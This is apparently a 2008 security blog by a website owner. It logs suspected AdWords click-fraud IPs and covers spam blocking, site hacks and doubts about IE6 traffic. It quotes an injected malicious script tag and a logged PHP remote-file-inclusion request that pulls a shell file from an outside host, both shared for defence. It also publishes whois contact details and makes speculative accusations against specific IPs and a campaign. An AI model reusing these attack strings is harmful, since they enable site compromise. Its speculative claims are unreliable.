Tuesday, June 10, 2008

Google Adwords Click Bots

After reviewing all the clicks on our ads last month and finding some clearly malware generated clicks on our site, I reported it to Google and waiting to hear back. The offending network has blocked out any traffic to our web sites from their network via their firewall. I suggested they turn on valid as well as invalid hits on their firewall to see where this traffic is coming from because we were getting bombed (and paying for) a huge amount of clicks from their network.

After digging deeper into network traffic I am seeing some things that I feel like Google should easily be able to block out as invalid clicks and not charge us for them. For instace I've found the following user agents in the mix:

internal zero-knowledge agent from 71.117.15.41 multiple times on 5/31/2008
VB Project from 66.233.201.171 on 6/1/2008
No user agent from 66.228.208.166 on 6/5/2008
libcurl agent from 69.41.14.151 on 5/28/2008
VB Project from 24.113.5.42 on 5/26/2008
No user agent from 75.146.62.233 on 5/26/2008
No user agent from 75.146.62.233 on 5/22/2008
No user agent from 75.146.62.233 on 5/16/2008

Additionally starting on 4/9/2008 we started to get a number of invalid requests which indicate they come from Google and I am very skeptical that these particualr requests are legitimate based on the analytics. I asked Google to stop sending us these types of referrals and it seems like we didn't get any today - I hope that they are gone for good because I am not sure the following clicks came from actual potential customers -- of note this particular IP: 206.169.110.66 also hit our site numerous times with something called "page_prefetcher".

6/9/2008 17:54 67.183.35.29
6/9/2008 14:26 96.239.200.74
6/9/2008 13:38 12.228.1.96
6/8/2008 20:53 67.228.207.202
6/7/2008 16:22 24.18.87.97
6/7/2008 12:58 67.225.66.92
6/6/2008 14:43 150.70.84.27
6/6/2008 14:07 67.135.34.242
6/6/2008 0:21 24.18.139.13
6/5/2008 17:35 4.179.53.243
6/5/2008 17:35 4.179.53.243
6/5/2008 1:15 66.228.208.166
6/3/2008 21:05 70.58.64.231
6/3/2008 19:31 76.28.185.32
6/3/2008 17:26 167.88.201.100
6/3/2008 10:59 66.235.13.106
6/3/2008 8:13 24.19.32.200
6/3/2008 1:20 75.146.62.233
6/2/2008 20:10 76.28.185.32
6/2/2008 20:02 76.28.185.32
6/2/2008 20:01 76.28.185.32
6/2/2008 17:46 216.128.111.206
6/2/2008 17:45 216.128.111.206
6/2/2008 17:43 216.128.111.206
6/2/2008 17:41 216.128.111.206
6/2/2008 17:40 216.128.111.206
6/2/2008 14:11 24.18.211.183
6/2/2008 10:02 66.224.213.198
6/1/2008 20:38 97.113.16.141
6/1/2008 17:37 66.233.201.171
6/1/2008 16:22 75.146.62.233
6/1/2008 4:54 75.146.62.233
5/31/2008 23:53 75.146.62.233
5/31/2008 20:27 67.182.151.157
5/31/2008 19:32 76.121.171.169
5/31/2008 17:05 71.117.15.41
5/31/2008 17:05 71.117.15.41
5/31/2008 17:05 71.117.15.41
5/31/2008 16:36 71.121.204.110
5/31/2008 15:12 66.147.230.40
5/31/2008 14:56 24.113.130.126
5/31/2008 13:19 71.231.107.142
5/30/2008 19:33 66.228.208.165
5/30/2008 19:33 66.228.208.165
5/30/2008 17:21 63.225.178.179
5/30/2008 15:37 216.128.111.204
5/30/2008 15:25 216.127.48.246
5/30/2008 13:47 216.254.12.195
5/30/2008 8:53 207.66.220.2
5/30/2008 7:45 150.70.84.27
5/30/2008 7:33 150.70.84.27
5/29/2008 20:54 24.16.195.38
5/29/2008 20:43 24.16.195.38
5/29/2008 19:16 66.228.208.165
5/29/2008 19:07 71.231.183.118
5/29/2008 16:12 76.22.29.101
5/29/2008 14:34 69.56.81.124
5/29/2008 12:35 69.56.81.146
5/29/2008 10:44 76.28.187.65
5/29/2008 9:05 216.127.38.230
5/29/2008 7:41 66.243.225.80
5/29/2008 6:47 66.228.208.167
5/29/2008 2:31 207.246.157.67
5/28/2008 18:25 69.41.14.151
5/28/2008 18:25 69.41.14.151
5/28/2008 13:37 66.228.208.166
5/28/2008 10:24 207.178.0.196
5/28/2008 10:18 75.172.16.64
5/28/2008 8:23 207.178.1.65
5/28/2008 8:17 70.193.81.125
5/27/2008 21:07 71.112.253.195
5/27/2008 17:14 38.100.225.210
5/27/2008 14:19 24.19.50.253
5/27/2008 13:25 66.165.27.95
5/27/2008 10:34 207.178.0.196
5/27/2008 10:15 207.178.14.6
5/26/2008 18:49 75.100.185.182
5/26/2008 17:26 71.120.229.172
5/26/2008 17:25 71.212.8.188
5/26/2008 16:58 150.70.84.48
5/26/2008 16:04 207.66.160.1
5/26/2008 16:04 76.121.42.138
5/26/2008 13:57 76.121.230.246
5/26/2008 12:34 69.29.203.249
5/26/2008 12:25 67.40.195.145
5/26/2008 12:25 67.40.195.145
5/26/2008 10:20 24.113.5.42
5/26/2008 10:12 207.178.0.196
5/26/2008 9:14 24.17.71.223
5/26/2008 8:53 24.17.71.223
5/26/2008 7:34 24.17.71.223
5/26/2008 3:47 75.146.62.233
5/25/2008 23:15 67.171.46.218
5/25/2008 20:13 150.70.84.48
5/25/2008 16:11 208.51.49.107
5/24/2008 20:51 24.113.18.222
5/24/2008 20:47 216.127.38.230
5/24/2008 20:46 24.113.18.222
5/24/2008 19:49 216.127.52.10
5/24/2008 19:48 24.113.130.126
5/24/2008 19:09 207.246.140.49
5/24/2008 15:31 207.66.160.61
5/24/2008 14:14 207.178.1.68
5/24/2008 13:22 24.21.113.66
5/24/2008 12:25 150.70.84.27
5/24/2008 12:15 216.127.48.244
5/24/2008 7:30 150.70.84.27
5/24/2008 7:29 207.66.220.2
5/23/2008 16:24 71.35.106.207
5/23/2008 15:26 98.203.214.173
5/23/2008 8:04 207.207.79.115
5/22/2008 14:30 67.168.130.61
5/22/2008 14:14 75.146.62.233
5/22/2008 12:23 24.17.217.160
5/22/2008 12:23 24.17.217.160
5/22/2008 10:08 207.178.14.1
5/21/2008 20:23 24.22.230.114
5/21/2008 15:03 71.164.20.21
5/21/2008 7:56 24.26.58.81
5/20/2008 19:20 65.101.143.10
5/20/2008 16:53 24.19.154.34
5/20/2008 14:29 65.113.243.198
5/20/2008 13:13 65.113.243.198
5/20/2008 11:29 207.66.220.2
5/20/2008 9:22 207.246.152.67
5/20/2008 8:00 207.246.152.70
5/20/2008 5:38 207.246.157.68
5/20/2008 5:23 76.28.190.90
5/20/2008 5:21 207.246.154.133
5/20/2008 3:01 207.178.0.196
5/20/2008 2:07 207.66.220.2
5/20/2008 2:03 216.240.139.9
5/20/2008 0:26 207.178.0.196
5/19/2008 17:06 70.192.106.3
5/19/2008 15:11 98.203.214.173
5/19/2008 15:09 98.203.214.173
5/19/2008 12:53 130.76.32.23
5/19/2008 12:30 71.39.132.114
5/19/2008 11:14 207.178.1.67
5/18/2008 20:24 207.246.157.65
5/18/2008 20:12 207.178.0.196
5/18/2008 19:22 68.178.78.154
5/18/2008 16:24 75.92.161.253
5/18/2008 14:34 216.127.52.12
5/18/2008 12:41 71.35.145.22
5/18/2008 11:45 207.66.220.2
5/18/2008 8:01 71.113.40.8
5/18/2008 7:46 207.178.0.196
5/17/2008 22:13 207.66.220.2
5/17/2008 16:26 207.246.154.132
5/17/2008 7:51 24.16.194.235
5/17/2008 5:51 75.146.62.233
5/16/2008 20:03 75.146.62.233
5/16/2008 15:42 155.70.23.45
5/16/2008 12:12 72.11.71.226
5/16/2008 11:07 207.246.157.69
5/16/2008 10:59 207.246.157.69
5/16/2008 5:56 207.246.140.49
5/15/2008 18:47 207.66.220.2
5/15/2008 12:34 207.178.0.196
5/15/2008 12:08 207.246.152.69
5/15/2008 12:06 207.246.152.69
5/15/2008 11:57 68.165.228.136
5/15/2008 8:08 216.127.43.132
5/15/2008 7:12 207.246.157.68
5/15/2008 7:01 216.127.48.242
5/15/2008 6:57 207.178.1.70
5/15/2008 6:50 67.160.45.57
5/15/2008 5:09 207.178.0.196
5/15/2008 5:03 207.178.57.67
5/14/2008 21:11 24.21.122.134
5/14/2008 10:21 207.178.1.67
5/14/2008 10:17 207.178.1.70
5/14/2008 10:17 207.178.1.67
5/14/2008 10:16 207.178.1.67
5/14/2008 10:15 207.178.1.67
5/14/2008 10:12 207.178.57.69
5/14/2008 6:26 207.66.220.2
5/14/2008 5:07 207.178.0.196
5/14/2008 5:04 216.127.44.11
5/14/2008 4:58 207.246.152.68
5/14/2008 4:47 207.246.157.68
5/14/2008 4:40 207.246.140.50
5/14/2008 1:05 216.127.43.134
5/14/2008 0:55 207.246.157.67
5/13/2008 23:04 216.127.48.241
5/13/2008 22:58 207.178.48.67
5/13/2008 22:55 207.178.1.68
5/13/2008 21:04 207.178.0.196
5/13/2008 20:09 207.246.157.67
5/13/2008 19:56 66.180.82.88
5/13/2008 18:43 216.127.38.228
5/13/2008 17:24 71.121.146.152
5/13/2008 15:31 207.178.0.196
5/13/2008 15:29 216.127.52.10
5/13/2008 15:25 216.127.48.244
5/13/2008 15:23 216.127.48.244
5/13/2008 13:39 207.178.1.68
5/13/2008 13:38 207.178.1.66
5/13/2008 13:36 207.178.26.2
5/13/2008 13:33 216.127.44.12
5/13/2008 13:29 216.127.44.12
5/13/2008 13:25 207.246.157.68
5/13/2008 13:22 207.246.157.68
5/13/2008 12:17 207.178.1.66
5/13/2008 9:52 216.127.52.9
5/13/2008 8:19 207.178.0.196
5/13/2008 8:03 207.178.0.196
5/13/2008 6:06 207.66.160.3
5/13/2008 4:32 216.127.48.242
5/13/2008 3:21 216.127.44.14
5/13/2008 3:20 216.127.44.14
5/13/2008 3:13 207.246.157.65
5/13/2008 3:13 207.246.157.65
5/13/2008 0:29 216.127.44.9
5/13/2008 0:14 216.127.44.14
5/12/2008 18:27 207.246.155.196
5/12/2008 18:27 207.246.155.196
5/12/2008 18:24 207.246.155.196
5/12/2008 18:12 207.178.0.196
5/12/2008 18:09 207.178.0.196
5/12/2008 18:07 207.178.0.196
5/12/2008 17:52 63.226.202.112
5/12/2008 17:40 71.231.209.183
5/12/2008 15:40 32.155.26.91
5/12/2008 13:07 207.178.1.69
5/12/2008 13:03 207.178.1.69
5/12/2008 12:47 216.127.38.228
5/12/2008 12:12 207.246.140.52
5/12/2008 12:06 207.246.140.52
5/12/2008 11:57 216.127.44.13
5/12/2008 10:45 216.127.44.11
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:55 98.203.133.46
5/12/2008 9:47 98.203.133.46
5/12/2008 9:42 207.178.1.68
5/12/2008 1:18 207.178.0.196
5/12/2008 1:06 207.246.152.66
5/11/2008 21:41 71.231.72.47
5/11/2008 18:35 76.28.152.19
5/11/2008 17:55 67.183.123.209
5/11/2008 17:38 207.246.140.51
5/11/2008 14:57 66.180.82.88
5/11/2008 11:58 66.180.82.88
5/11/2008 9:39 207.178.0.196
5/11/2008 9:00 207.178.0.196
5/11/2008 8:54 216.127.48.241
5/11/2008 8:03 207.178.57.69
5/11/2008 6:37 98.203.133.46
5/11/2008 6:28 98.203.133.46
5/11/2008 6:15 207.178.1.69
5/11/2008 3:05 71.231.133.31
5/11/2008 2:25 207.178.1.67
5/11/2008 2:18 207.246.152.70
5/11/2008 2:10 207.246.140.50
5/11/2008 0:29 71.113.51.111
5/11/2008 0:22 207.178.0.196
5/10/2008 19:45 76.28.190.90
5/10/2008 18:35 207.246.157.69
5/10/2008 18:05 207.246.157.68
5/10/2008 17:56 216.127.48.241
5/10/2008 17:52 216.127.48.241
5/10/2008 16:25 66.180.82.88
5/10/2008 14:26 67.168.174.55
5/10/2008 13:39 216.127.38.230
5/10/2008 13:37 207.246.157.65
5/10/2008 13:37 216.127.38.230
5/10/2008 13:36 216.127.38.230
5/10/2008 12:24 207.178.0.196
5/10/2008 11:08 207.246.157.68
5/10/2008 10:58 207.178.1.69
5/10/2008 10:26 207.178.57.69
5/10/2008 10:13 216.127.52.9
5/10/2008 9:47 207.178.0.196
5/10/2008 9:36 216.127.38.230
5/10/2008 9:28 207.178.14.4
5/10/2008 9:26 207.178.14.4
5/10/2008 8:45 207.66.160.3
5/10/2008 8:42 207.66.160.3
5/10/2008 4:02 216.127.44.14
5/9/2008 20:15 67.160.58.222
5/9/2008 9:13 24.22.210.15
5/9/2008 9:13 24.22.210.15
5/8/2008 21:26 75.146.62.233
5/8/2008 17:15 206.191.173.159
5/8/2008 15:27 75.121.224.62
5/8/2008 11:14 207.178.0.196
5/8/2008 11:14 207.178.0.196
5/8/2008 11:14 207.178.0.196
5/7/2008 19:20 69.10.212.5
5/7/2008 16:48 66.180.82.88
5/7/2008 12:16 66.165.5.154
5/7/2008 11:59 24.18.210.251
5/6/2008 21:30 71.121.134.24
5/6/2008 12:47 207.178.0.196
5/6/2008 11:44 75.216.224.213
5/6/2008 9:30 150.70.84.154
5/6/2008 8:56 66.180.82.88
5/5/2008 15:11 216.240.139.9
5/5/2008 9:07 66.180.82.88
5/5/2008 6:06 24.18.187.97
5/4/2008 12:59 24.19.46.195
5/3/2008 19:13 152.117.241.94
5/3/2008 16:20 71.112.8.239
5/2/2008 14:40 67.170.104.206
5/2/2008 14:21 76.115.181.71
5/2/2008 12:14 66.213.206.2
5/1/2008 13:12 66.150.9.2
5/1/2008 13:11 65.102.63.59
4/30/2008 20:49 207.108.209.249
4/30/2008 19:21 207.200.116.71
4/30/2008 19:21 207.200.116.71
4/30/2008 16:27 208.70.118.237
4/30/2008 12:24 71.188.250.70
4/29/2008 12:55 4.242.9.82
4/29/2008 12:55 4.242.9.82
4/29/2008 11:55 67.170.95.168
4/29/2008 10:06 71.112.244.57
4/29/2008 10:04 71.112.244.57
4/27/2008 10:22 98.225.29.252
4/27/2008 7:31 24.18.228.135
4/26/2008 19:23 71.212.2.103
4/26/2008 19:01 70.125.156.68
4/26/2008 12:03 76.121.14.238
4/25/2008 14:24 146.129.247.2
4/25/2008 10:19 75.165.14.201
4/25/2008 2:55 199.117.2.58
4/24/2008 20:19 207.200.116.6
4/24/2008 20:19 207.200.116.6
4/24/2008 20:15 207.200.116.134
4/24/2008 20:15 207.200.116.134
4/24/2008 20:10 75.121.224.31
4/24/2008 16:07 65.160.238.180
4/24/2008 14:56 67.183.126.104
4/24/2008 14:24 67.183.126.104
4/22/2008 14:13 207.225.242.1
4/22/2008 10:01 64.122.250.13
4/21/2008 17:16 4.242.60.232
4/21/2008 16:50 4.242.60.232
4/21/2008 9:01 76.84.97.87
4/20/2008 19:49 24.18.132.106
4/20/2008 16:31 216.240.139.9
4/20/2008 9:00 24.113.218.28
4/20/2008 8:24 70.109.87.156
4/19/2008 9:29 67.101.1.198
4/19/2008 9:05 66.67.167.138
4/18/2008 12:16 68.55.80.153
4/18/2008 11:02 74.61.14.69
4/18/2008 8:36 216.220.163.131
4/17/2008 14:52 204.11.206.66
4/17/2008 10:54 72.160.81.9
4/17/2008 9:41 67.171.38.15
4/17/2008 7:54 70.145.72.210
4/16/2008 8:35 130.76.32.145
4/16/2008 1:08 76.22.98.254
4/15/2008 20:36 38.103.128.245
4/15/2008 11:33 63.229.10.210
4/15/2008 11:04 64.221.112.226
4/15/2008 8:11 150.70.84.27
4/14/2008 13:31 208.64.242.83
4/14/2008 10:52 38.103.128.245
4/14/2008 8:55 204.246.129.196
4/14/2008 8:17 38.103.128.245
4/14/2008 8:15 38.103.128.245
4/14/2008 8:15 38.103.128.245
4/14/2008 7:03 150.70.84.154
4/13/2008 15:04 4.242.60.93
4/13/2008 15:00 4.242.60.93
4/13/2008 14:35 4.242.60.93
4/13/2008 14:08 71.231.10.128
4/13/2008 14:08 71.231.10.128
4/13/2008 14:08 71.231.10.128
4/12/2008 16:25 75.172.87.114
4/12/2008 15:59 24.145.231.173
4/12/2008 15:26 71.249.87.226
4/12/2008 14:27 69.214.22.116
4/12/2008 12:33 207.43.224.70
4/12/2008 12:33 207.43.224.80
4/12/2008 9:57 150.70.84.27
4/12/2008 9:46 70.145.21.26
4/12/2008 9:28 74.242.96.197
4/12/2008 1:54 216.240.139.9
4/11/2008 23:57 65.101.141.82
4/11/2008 21:31 4.243.49.100
4/11/2008 8:30 67.170.85.124
4/10/2008 14:11 150.70.84.154
4/9/2008 20:26 71.127.254.195
4/9/2008 17:22 198.238.208.2
4/9/2008 15:51 199.233.178.253
4/9/2008 14:54 208.65.83.39
4/9/2008 13:44 67.183.164.154
4/9/2008 12:00 199.147.202.24
4/9/2008 11:49 199.147.202.24
4/9/2008 10:00 150.70.84.27
4/9/2008 8:41 216.20.149.124

Thursday, June 05, 2008

Email account hacked - Service Provider Corporation

My webmail company (finally someone did it) put a bar in my webmail that shows the last time someone logged in and from what IP address. I don't understand why ALL email companies do not do this. Bravo.

Anyway, that's when I found out that someone at this IP address had logged into my email account, and wasn't me:

166.129.232.106

OrgName: Service Provider Corporation
OrgID: SPC-10
Address: 442 Route 202-206 North
Address: # 485
City: Bedminster
StateProv: NJ
PostalCode: 07921-0523
Country: US

NetRange: 166.128.0.0 - 166.255.255.255

Identity Theft Prosecuted at Less than 1%

Watching Dateline show on identity theft, they report that only 1% of identity thefts are actually prosecuted. The problem, as suggested many times in this blog, these identity thefts are residing in other countries and local law enforcement has their hands tied in doing anything about it. This is an international crime and political issue, exacerbated further now that the identity theft rings have been reportedly moving into Iran where they believe they cannot be touched by the U.S. government. This is part of the money that is pouring out of the United States and into the bank accounts of thefts, criminals and possibly, foreign governments that may not have good intentions for the United States.

Recently, I met with an investor to catch up and ponder investment and business ideas, but after first hearing that my ideas were a conspiracy theory, even though many legitimate magazines, newspapers, television shows and a contact at the FBI have backed up my factual reports, I decided I was a bit too forward thinking and probably should go it alone for now (and he probably won't have invested anyway because I did not really go into detail about my plans and maybe he wouldn't have gotten it or maybe I am just clueless and my ideas will not amount to any money).

Just like the first spam filters were hated by people because maybe one or two good emails got caught, people don't get blocking out bad Internet traffic to save their businesses and prevent crime, hackers, spoofing, scraping and malware on their computers.

As far as stopping the crime altogether a wall only goes so far. Basically the world needs some big changes to catch and stop these crime rings, that perhaps are working hand in hand with drug lords and terrorists - since it has been reported that Internet crime is now more profitable than drugs. Laws need to change, and the International community, venture capitalists, and even the average user or at least the average business web site owner needs to catch up with reality and what needs to be done about these problems.

Saturday, May 10, 2008

winzipices.cn - check your site

A bunch of sites are infected with malware according to this article:

https://webmail.intermedia.net/services/go.php?url=http%3A%2F%2Fwww.networkworld.com%2Fnews%2F2008%2F050708-web-attack-worm-infecting-hapless.html%3Fnlhtsec%3Drn_050908%26nladname%3D050908securityal

You can see sites that are infected by simply searching on "winzipices.cn" in Google but do NOT go to those web sites or your computer will be affected as described in the article.

You can see if your own site is infected by typing into goole: "site:[yourdomain.com] winzipices.cn".

Google in the past has put warnings on infected sites - hopefully they will do so with all of these soon.

Sunday, May 04, 2008

How to Eliminate A Lot More Spam

Here's how you can eliminate a large percentage of the spam you are still getting:

#1 Get Postini - I got the $12/yr security service that allows the following configurations.

#2 On your inbound server configuration in Postini - if you mainly only communicate the US block out entire blocks of IPs in other countries you do not need where a lot of spam orginiates such as (you may want to block more or less depending on your communication patterns):

41.0.0.0-41.255.255.255
77.0.0.0-89.255.255.255
189.0.0.0-202.255.255.255
58.0.0.0-62.255.255.255
192.0.0.0-192.255.255.255
125.0.0.0-125.255.255.255

#3. If there's a particular person you do need to communicate with in these countries add them to your white list so they don't get blocked by the above.

#4. When you set up Postini you will change your MX records and then you will realize there's a lot of spam getting inserted directly into your mail server that is not even using your MX records. All this spam can be prevented by changing the firewall rules for your mail server to only accept mail from Postini IP addresses.

#5. You may want to only accept messages from mail hosts that support TLS because any legitimate mail provider will support this. Any hacked mail servers that are some admin throwing mail server software on a machine out of the box without setting it up properly to prevent relay - might not have have TLS running. TLS will also secure your messages in transit which is the real purpose. If someone claims they cannot send to you because they are not using a mail server that supports TLS - tell them to get a new mail provider.

#6. If any other spam squeaks through, look at the mail header to get the ORIGINATING IP address and block it out at Postini and you won't get mail from that possibly hacked email provider any longer.

Friday, April 25, 2008

Obama and Clinton Sites Hacked - Among Others

Obama and Clinton had their web sites hacked according to netcraft report: Obama Clinton site hacks Hmm. Obama's primary site was hacked. Clinton's was not. Clinton is raising a lot of money suddenly. Coincidence?

Check your web site security. It matters.

Oh and by the way the UN site was hacked too (among others):
UN Web site Hacked

Patch or Be Hacked in 30 Seconds

This is why you should install patches sooner than later:

Microsoft Vulnerabilities Hacked in 30 seconds

Iframe Hack

Here's how to check if your site is one of the many with the latest iframe hack:

Search all your web pages for code like this and remove it:


<script src=http://www.nihaorr1.com/1.js>


More info:
Iframe hack

Keyword Spy

These people are probably dissecting your web content to copy and put onto their own web sites.

66.34.204.26

The referrer is always something like:
http://www.keywordspy.com/...

You may want to block them.

Contact the network and ask them to stop.

C I Host CIHOST4 (NET-66-34-0-0-1)
66.34.0.0 - 66.34.255.255
CIHS PROPAGATION4 (NET-66-34-0-0-2)
66.34.0.0 - 66.34.255.254


If this is not illegal, it should be.

Friday, April 18, 2008

Bots Scanning Google Hacking Tons of Web Sites

See my post about IE6 scanning Google links in a recent post:

http://www.networkworld.com/news/2008/041708-sans-solves-mystery-of-mass.html?Inform=nl&nlhtsec=rn_041808&nladname=041808securityal

The results of scans and hacking was reported back to a computer in China.

Update your software!

Friday, April 11, 2008

Postini - Spam is Down

Using Postini spam has decreased from about 900 messages per day to 19 yesterday. 19 is still too many but it's getting better...

Tuesday, April 08, 2008

Postini Test

Testing out Postini and gave them a day to catch up. I've been sending all my spam and full mail headers to spam@postini.com as recommended on the contact page of their web site. Here are the statistics so far.

Today Postini caught about 33 spam messages.

I sent them about 61 messages that their spam filters did not catch.

That being said I just recently added some spam ridden aliases to their spam configuration (which is pretty decent though it could be a bit more user friendly and easy to find what you are looking for...)

Also I found a bunch of spam -- in my SENT items - which were sent to me on the Intermedia mail system which I think is based on Horde. Some of those may have been pretty old.

As I write this I just logged in to find two more spam messages in my in box.

We'll see how they do tomorrow...

Sunday, April 06, 2008

Email Server Check

Here's a cool site which helps you test your MX records to first of all find out what they are, and then test diagnostics such as if your mail server is an open relay - very bad - on blacklists - also not good, or not performing well.

http://www.mxtoolbox.com/

For instance this site shows that intermedia.net has an smtp server that is potentially an open relay and responding very slowly.

Two electricmail.com servers return slowly and the second one has a reverse dns problem.

Check your mail servers by putting in your domain name, then run the diagnostic and blacklist test and ask your mail providers to fix any problems they find.

Monday, March 31, 2008

Further Convinced IE6 is used for maliciousness

I am further convinced that users of IE6 or their computers are up to no good and that at least a part of your IE6 traffic is bogus and used for purposes other than for people to learn about and buy your products and services.

Not only do most IE6 users in general not upgrade their browser after being locked out of the site which was done as a test to see if this traffic is legit - most of the traffic is a one-off hit and not by users of these sites who are typically frequent visitors looking for updated information. Long time legitimate users are not typically the ones using IE6 - it is the random one-off visitor hitting odd sites that it is very strange they would be trafficking in the first place.

For instance, there's an IP in Brazil - a known big source of spam - hitting a site over and over again with different browsers probably trying to decipher how to crack through this blocking. They are looking at a site with Christmas related items. It is doubtful that at this time of year someone in Brazil is trying that hard to view Christmas decorations in the US that are not even for sale online.

As a side note a lot of people from Brazil travel to a location related to a travel booking site we run - could this be a travel agent or criminal in Brazil trying to copy the site and direct traffic to them instead of us?

Here's the IP: 201.77.3.1

inetnum: 201.77.0/20
aut-num: AS28650
abuse-c: RFS185
owner: Dilmar Antonio Simonetti
ownerid: 031.743.818/0001-28
responsible: Dilmar Simonetti
owner-c: RFS185
tech-c: RFS185
inetrev: 201.77.0/21
nserver: ns.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
nserver: ns2.simonet.com.br
nsstat: 20080330 AA
nslastaa: 20080330
created: 20060607
changed: 20060607

nic-hdl-br: RFS185
person: Rogerio Ferreira dos Santos
e-mail: roger@simonet.com.br
created: 20010816
changed: 20060307

Saturday, March 29, 2008

Google Gets Into Security Outsourcing

This is very interesting and I like it, for the most part, because I think a company with lots of money will need to do this to really be effective:

Google bought Postini and is offering small businesses a way to "outsource" their security. Now, there are many aspects of security and this does not exactly cover the things I mentioned in my last post. That's a different animal. The portion of security in this case is scanning emails before they get to you and web site responses before they get to you.

Outsourced Security

The thing about Google, is that they have a lot of really smart people and money. And I have a feeling Google might have a little bit of a bent to help make the world a better place. The way Google can really help would be to consolidate anonymous access of all this data coming from bots and hacked computers, spammers, scammers and criminals, and use it to prosecute the offenders.

This is not an easy task as many criminals are outside the US or perhaps inside the US doing their dirty work through people outside the US or perhaps outside the US masquerading as people inside the US. Anything crossing international borders is going to be tricky and probably involve some politicians.

And in general, tackling this big problem is going to cost a lot of money to stay on top of the analysis to do this thing right - and really stay ahead of the hackers - who are some really smart brains whose day is spent 100% trying to figure out how to crack your password, hack your system, steal the money in your bank account, divert your business to themselevs, etc.

There is one thing about this solution that bothers me however. If Google sets up a bunch of proxy servers for small businesses - are they going to pass through legitimate information about the person making a request on your web site? Or will all the requests look like they are coming from Google? That gives Google a strangle hold on a lot of marketing people which is not a good idea. It also sets up the service to work like AOL which a haven for hackers and criminals who want to hide their identity. That is my only concern so far about this service, which is otherwise great.

The Cost of Cheap Web Sites

Ok so you figured it out and you threw your cheap PHP site online and you think you're cool right? But if you're not monitoring you site carefully and updating to get all the latest patches - constantly - you may be aiding and abetting hackers, phishers and spammers.

http://www.networkworld.com/news/2008/032808-google-search-behind-most-phishing.html

If you don't know what you're doing - use a system from a company that has security built in and handles all the hosting and security for you - man in the middle, sql injection, cross site scripting, bot traffic filtering, code injection, OS updates, web platform updates and constant monitoring of security issues - and help make the world a better place. There are places you can get "cheap" web sites if you really want one without creating these problems for the rest of the world.

The problem is really that all these people who go out and get cheap and free web sites and don't know what they are doing created headaches for the rest of the world - who foots the bill when their web site gets hacked and is used for malicious purposes.

IE6 - Fake Traffic or Surrogate Traffic

This is a prediction which I cannot exactly prove yet, but I am guessing something like this might be going on - and perhaps this is old news because I don't know every security vulnerability that exists for IE6.

My guess is that much of your traffic coming to your web server from IE6 may in fact not be traffic from the person who owns that computer or server. I am guessing that much of the IE6 traffic you see in your logs is a third party who has hijacked that machine, browser, or maybe a session or whatever to hide their true identity while sniffing around for security problems, hijacking your web site content, or possibly blocking search engines from getting to your site to hurt your rankings...not sure but there's something really weird about all the IE6 traffic on my server.

And even more odd is that when this traffic is blocked with a request to upgrade the browser, the user of that machine doesn't upgrade. I find it hard to believe that with all the security hype and fear of stolen identity and access to bank accounts that these users refuse to upgrade their browser. I think maybe these are old machines sitting around that have a browser on them that isn't even used, perhaps, and some hacker has gotten onto it and uses it to hide the true source of the traffic.

Friday, March 28, 2008

PHP hack - shell - 216.191.16.12

IP address 82.210.107.191 is attempting get to one of our urls with a url that ends in a php page like this:

main.php?pageURL=http://216.191.16.12/.shell/site/iyes.txt??

Apparently there is another PHP hack on the loose.

Thursday, March 27, 2008

Supsicious and possibly related IPs

I think at least some of these computers have something in common - like they are hacked or run by hackers. In particular the IP address 96.10.27.184 is clearly trying to alter the user agent in their request. I am pretty sure some of the others are doing the same. A few of them may be people who just need to update their browsers to the latest version.

Another interesting thing is that most of these visits were referred by Google for whatever that is worth.

3/27/2008 17:05 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:04 65.101.145.170
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:01 206.28.72.1
3/27/2008 17:00 206.28.72.1
3/27/2008 16:23 75.165.40.66
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:05 206.169.226.229
3/27/2008 16:00 75.213.19.243
3/27/2008 15:33 208.152.32.185
3/27/2008 15:33 208.152.32.185
3/27/2008 15:32 96.10.27.184
3/27/2008 15:25 206.188.43.45
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:22 208.152.32.185
3/27/2008 15:21 65.122.125.226
3/27/2008 15:21 65.122.125.226
3/27/2008 15:20 199.245.127.5
3/27/2008 15:20 65.122.125.226
3/27/2008 15:20 65.122.125.226
3/27/2008 15:19 199.245.127.5
3/27/2008 15:16 208.100.138.5
3/27/2008 15:15 69.88.119.126
3/27/2008 15:15 69.88.119.126
3/27/2008 15:14 69.88.119.126
3/27/2008 15:07 68.178.99.210
3/27/2008 14:50 65.101.142.202
3/27/2008 14:50 96.10.27.184
3/27/2008 14:48 65.101.142.202
3/27/2008 14:48 65.101.142.202
3/27/2008 14:47 65.101.142.202

Wednesday, March 26, 2008

Offshore Fraud Alerts

Watching American Greed on CNBC and listening to all the scams people fall for (if it's too good to be true...it probably is) and learned about this web site Offshore Alert which has information on various offshore scams.

Sunday, March 23, 2008

IP Range lists Two Country Codes

This IP range list two country codes - Belgium and The Netherlands

inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL

IP Range lists two country codes

This IP range lists two countries - Belgium and The Netherlands:

inetnum: 217.22.48.0 - 217.22.63.255
org: ORG-RA1-RIPE
admin-c: MUN2-RIPE
netname: BE-REALROOT-20030213
descr: New Media Ventures BVBA
country: BE
country: NL

Saturday, March 22, 2008

Do you know where your email address is listed?

Go to Google and type in your email address.

If you don't like where it's listed, report it to Google and the web site owner to try to get it removed.

Good luck.

Many news groups publish people's names and email addresses on web sites - and not only that they publish these news groups get copied to all kinds of third party sites - so your name and email address is spread all over search engine results.

This makes it extremely easy for hackers and spammers who scan web pages to pick up your email address all over the place.

One site changed all the email addresses to something like this name <at> emailaddress.com

That doesn't really hide the address.

Try to contact these web sites and ask them to remove your name and email address. Some of them will do it. After many contacts some web sites still have not responded and other web sites have said they will remove the pages but it takes forever for them to remove it and even longer for it to be removed from search engine caches so it doesn't show up in search engine listings.

Should it be legal to post someone's private contact information without consent?

Sunday, March 16, 2008

Code Injected Into Trend Micro Web Site

Trend Micro has some security software among other things so it is ironic that their web site was the victim of a code injection attack which apparently sent people to some evil sites in China. This reinforces that web site hacks are more prevalent than most companies realize or admit: Trend Micro Web Site Hacked

Hack - quoted identifies - SQL 2000

